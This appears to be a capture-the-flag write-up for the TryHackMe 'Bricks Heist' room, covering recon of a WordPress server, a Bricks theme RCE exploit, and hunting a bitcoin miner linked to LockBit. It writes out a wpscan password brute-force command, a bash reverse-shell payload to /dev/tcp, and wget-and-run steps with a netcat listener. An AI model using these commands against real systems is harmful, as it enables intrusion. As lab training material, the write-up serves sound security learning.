TryHack3M: Bricks Heist
Difficulty: Easy
OS: Linux
Category: CVE-2024–25600, RCE, Bitcoin, Wordpress, Threat Hunting
Description: Crack the code, command the exploit! Dive into the heart of the system with just an RCE CVE as your key.
Task 1: Challenge
From Three Million Bricks to Three Million Transactions!
Brick Press Media Co. was working on creating a brand-new web theme that represents a renowned wall using three million byte bricks. Agent Murphy comes with a streak of bad luck. And here we go again: the server is compromised, and they’ve lost access.
Can you hack back the server and identify what happened there?
Note: Add MACHINE_IP bricks.thm
to your /etc/hosts file.
Question 1: What is the content of the hidden .txt file in the web folder?
Directory scan revels nothing
Changing the method using burp suite
Request
Response
Nmap scan
# Nmap 7.94SVN scan initiated Wed Apr 17 13:18:39 2024 as: nmap -sCV -T4 --min-rate=1000 -O -oN scan bricks.thm
Nmap scan report for bricks.thm (10.10.187.87)
Host is up (0.14s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 bb:f5:9b:f1:17:9d:4f:08:a8:13:cc:c1:59:70:f3:32 (RSA)
| 256 85:aa:54:22:6e:e0:0f:6e:03:33:ea:fb:72:94:bb:d5 (ECDSA)
|_ 256 be:59:37:f9:fa:31:ee:11:46:ad:fb:6a:5e:f1:1b:7d (ED25519)
80/tcp open http WebSockify Python/3.8.10
|_http-title: Error response
|_http-server-header: WebSockify Python/3.8.10
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 405 Method Not Allowed
| Server: WebSockify Python/3.8.10
| Date: Wed, 17 Apr 2024 12:18:45 GMT
| Connection: close
| Content-Type: text/html;charset=utf-8
| Content-Length: 472
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
| "http://www.w3.org/TR/html4/strict.dtd">
| <html>
| <head>
| <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
| <title>Error response</title>
| </head>
| <body>
| <h1>Error response</h1>
| <p>Error code: 405</p>
| <p>Message: Method Not Allowed.</p>
| <p>Error code explanation: 405 - Specified method is invalid for this resource.</p>
| </body>
| </html>
| HTTPOptions:
| HTTP/1.1 501 Unsupported method ('OPTIONS')
| Server: WebSockify Python/3.8.10
| Date: Wed, 17 Apr 2024 12:18:46 GMT
| Connection: close
| Content-Type: text/html;charset=utf-8
| Content-Length: 500
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
| "http://www.w3.org/TR/html4/strict.dtd">
| <html>
| <head>
| <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
| <title>Error response</title>
| </head>
| <body>
| <h1>Error response</h1>
| <p>Error code: 501</p>
| <p>Message: Unsupported method ('OPTIONS').</p>
| <p>Error code explanation: HTTPStatus.NOT_IMPLEMENTED - Server does not support this operation.</p>
| </body>
|_ </html>
443/tcp open ssl/http Apache httpd
|_http-generator: WordPress 6.5
|_http-title: 400 Bad Request
|_http-server-header: Apache
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=US
| Not valid before: 2024-04-02T11:59:14
|_Not valid after: 2025-04-02T11:59:14
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
| tls-alpn:
| h2
|_ http/1.1
3306/tcp open mysql MySQL (unauthorized)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.94SVN%I=7%D=4/17%Time=661FBE25%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,291,"HTTP/1\.1\x20405\x20Method\x20Not\x20Allowed\r\nServer:\
SF:x20WebSockify\x20Python/3\.8\.10\r\nDate:\x20Wed,\x2017\x20Apr\x202024\
SF:x2012:18:45\x20GMT\r\nConnection:\x20close\r\nContent-Type:\x20text/htm
SF:l;charset=utf-8\r\nContent-Length:\x20472\r\n\r\n<!DOCTYPE\x20HTML\x20P
SF:UBLIC\x20\"-//W3C//DTD\x20HTML\x204\.01//EN\"\n\x20\x20\x20\x20\x20\x20
SF:\x20\x20\"http://www\.w3\.org/TR/html4/strict\.dtd\">\n<html>\n\x20\x20
SF:\x20\x20<head>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20http-equiv=\"C
SF:ontent-Type\"\x20content=\"text/html;charset=utf-8\">\n\x20\x20\x20\x20
SF:\x20\x20\x20\x20<title>Error\x20response</title>\n\x20\x20\x20\x20</hea
SF:d>\n\x20\x20\x20\x20<body>\n\x20\x20\x20\x20\x20\x20\x20\x20<h1>Error\x
SF:20response</h1>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code:\x204
SF:05</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Message:\x20Method\x20Not\x2
SF:0Allowed\.</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code\x20exp
SF:lanation:\x20405\x20-\x20Specified\x20method\x20is\x20invalid\x20for\x2
SF:0this\x20resource\.</p>\n\x20\x20\x20\x20</body>\n</html>\n")%r(HTTPOpt
SF:ions,2B9,"HTTP/1\.1\x20501\x20Unsupported\x20method\x20\('OPTIONS'\)\r\
SF:nServer:\x20WebSockify\x20Python/3\.8\.10\r\nDate:\x20Wed,\x2017\x20Apr
SF:\x202024\x2012:18:46\x20GMT\r\nConnection:\x20close\r\nContent-Type:\x2
SF:0text/html;charset=utf-8\r\nContent-Length:\x20500\r\n\r\n<!DOCTYPE\x20
SF:HTML\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x204\.01//EN\"\n\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\"http://www\.w3\.org/TR/html4/strict\.dtd\">\n<html>\
SF:n\x20\x20\x20\x20<head>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20http-
SF:equiv=\"Content-Type\"\x20content=\"text/html;charset=utf-8\">\n\x20\x2
SF:0\x20\x20\x20\x20\x20\x20<title>Error\x20response</title>\n\x20\x20\x20
SF:\x20</head>\n\x20\x20\x20\x20<body>\n\x20\x20\x20\x20\x20\x20\x20\x20<h
SF:1>Error\x20response</h1>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20c
SF:ode:\x20501</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Message:\x20Unsuppo
SF:rted\x20method\x20\('OPTIONS'\)\.</p>\n\x20\x20\x20\x20\x20\x20\x20\x20
SF:<p>Error\x20code\x20explanation:\x20HTTPStatus\.NOT_IMPLEMENTED\x20-\x2
SF:0Server\x20does\x20not\x20support\x20this\x20operation\.</p>\n\x20\x20\
SF:x20\x20</body>\n</html>\n");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=4/17%OT=22%CT=1%CU=43814%PV=Y%DS=2%DC=I%G=Y%TM=661F
OS:BE95%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)
OS:OPS(O1=M508ST11NW7%O2=M508ST11NW7%O3=M508NNT11NW7%O4=M508ST11NW7%O5=M508
OS:ST11NW7%O6=M508ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)
OS:ECN(R=Y%DF=Y%T=40%W=F507%O=M508NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%
OS:F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T
OS:5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=
OS:Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF
OS:=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40
OS:%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Apr 17 13:20:37 2024 -- 1 IP address (1 host up) scanned in 118.00 seconds
This reveals there is a wordpress site running on 443
Next up is to perform a directory scan and wpscan
wpscan --url https://bricks.thm/ --enumerate dbe,cb,u,ap --detection-mode aggressive --disable-tls-checks
I added the --disable-tls-checks
because it keeps throwing this error without it.
wpscan
returns some information
XML-RPC
is enabled, which means we can perform brute force.
We also have a valid username
Brute forcing for a valid password
wpscan --url https://bricks.thm/ -U administrator -P /usr/share/wordlists/rockyou.txt --disable-tls-checks
While the brute force is running, i also noticed the version of wordpress running
Checked for any public exploit but found none.
Couldn’t find any passwords with the bruteforce also. After much searching around the application, i decided to check out the theme version for any exploit
Checking online we can see there is an RCE exploit for it
I mean the room name literally has “bricks” in it and room description talks about RCE lol
Clone the exploit repo, install requirements and run the exploit
And we have shell access
First flag obtained
Question 2: What is the name of the suspicious process?
The shell isn’t a proper shell so i had to get a stable shell. To do that:
- Put the following payload in a file named shell.sh. Payload:
bash -c 'exec bash -i &>/dev/tcp/IP/PORT <&1'`
- Start a python server on your machine.
python -m http.server
- On target machine use wget to download the file
wget http://IP:PORT/shell.sh
- Make the file an executable
chmod +x shell.sh
- Start a netcat listener on your machine
nc -lvnp PORT
same port as the one in payload. - Run the script
./shell.sh
And with that you will get a shell.
To get an even better shell, run the following
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl + Z (background shell)
stty raw -echo;fg
Press ENTER
Next up is to find a suspicious process.
We can use the systemctl
command for this
systemctl list-units --type=service --state=running
Press ENTER to keep displaying more services
We have our answer for both questions What is the name of the suspicious process? & What is the service name affiliated with the suspicious process?
What is the log file name of the miner instance?
Navigating to the /lib/NetworkManager
directory, we have a configuration file that contains logs on the miner instance
What is the wallet address of the miner instance?
Checking the beginning of the file with the command head -n 30 inet.conf
, we have a code here.
Using cyberchef to decode it
We have a code here.
If you notice carefully we have almost identical code
bc1qyk79fcp9hd5kreprce89tkh4wrtl8avt4l67qa | bc1qyk79fcp9had5kreprce89tkh4wrtl8avt4l67qa
Spilt
bc1qyk79fcp9hd5kreprce89tkh4wrtl8avt4l67qa
bc1qyk79fcp9had5kreprce89tkh4wrtl8avt4l67qa
Both start with bc1
but differ in 9hd
9had
Doing a quick search
So the correct answer is the second one
bc1qyk79fcp9had5kreprce89tkh4wrtl8avt4l67qa
The wallet address used has been involved in transactions between wallets belonging to which threat group?
After searching a million websites using both addresses, i finally found it.
Using this website link. I searched for this address bc1qyk79fcp9hd5kreprce89tkh4wrtl8avt4l67qa
Lot’s of transactions came out. I looked at the last one
Clicked on privacy issues
Then searched for this address online
We have some information related to maybe cyber crime
Going to this site
We have a name “Ivan Gennadievich”
Looks like he was involved in some really bad stuff. Further research on his name lead me to the answer
LockBit
The End.